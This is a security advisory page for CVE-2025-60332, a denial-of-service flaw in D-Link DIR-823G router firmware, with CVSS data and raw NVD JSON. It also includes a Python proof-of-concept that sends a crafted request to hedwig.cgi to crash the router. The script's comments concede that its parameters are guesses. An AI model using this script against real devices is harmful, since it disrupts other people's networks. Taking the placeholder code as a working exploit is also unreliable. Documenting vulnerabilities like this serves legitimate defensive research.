Security Vulnerability Report
中文
CVE-2025-60332 CVSS 7.5 HIGH

CVE-2025-60332

Published: 2025-10-22 15:16:01
Last Modified: 2025-10-24 13:19:21

Description

A NULL pointer dereference in the SetWLanRadioSettings function of D-Link DIR-823G A1 v1.0.2B05 allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-823g_firmware:1.0.2b05:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dir-823g:a1:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DIR-823G A1 v1.0.2B05

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-60332 PoC - D-Link DIR-823G NULL Pointer Dereference # Target: D-Link DIR-823G A1 v1.0.2B05 # Vulnerability: NULL pointer dereference in SetWLanRadioSettings function target_ip = "192.168.0.1" # Default D-Link router IP target_url = f"http://{target_ip}/hedwig.cgi" # Crafted payload to trigger NULL pointer dereference # The specific parameters depend on the SetWLanRadioSettings function implementation payload = { "service": "SetWLanRadioSettings", "wlan_radio_settings": "", # Empty or malformed parameter # Additional parameters that trigger NULL pointer dereference } try: response = requests.post(target_url, data=payload, timeout=5) print(f"Response Status: {response.status_code}") print(f"Response: {response.text}") except requests.exceptions.RequestException as e: print(f"Request failed: {e}") print("Target may be vulnerable and crashed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60332", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:16:00.733", "lastModified": "2025-10-24T13:19:20.730", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A NULL pointer dereference in the SetWLanRadioSettings function of D-Link DIR-823G A1 v1.0.2B05 allows attackers to cause a Denial of Service (DoS) via a crafted HTTP request."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-823g_firmware:1.0.2b05:*:*:*:*:*:*:*", "matchCriteriaId": "14A8546A-7F37-43D2-AD1E-DF65C6734057"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-823g:a1:*:*:*:*:*:*:*", "matchCriteriaId": "EF303ADD-7BAC-4D2A-B644-D03B23F76DDB"}]}]}], "references": [{"url": "https://github.com/z472421519/BinaryAudit/blob/main/PoC/NPD/DIR823G/SetWLanRadioSetting.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.dlink.com/en/security-bulletin/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/z472421519/BinaryAudit/blob/main/PoC/NPD/DIR823G/SetWLanRadioSetting.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}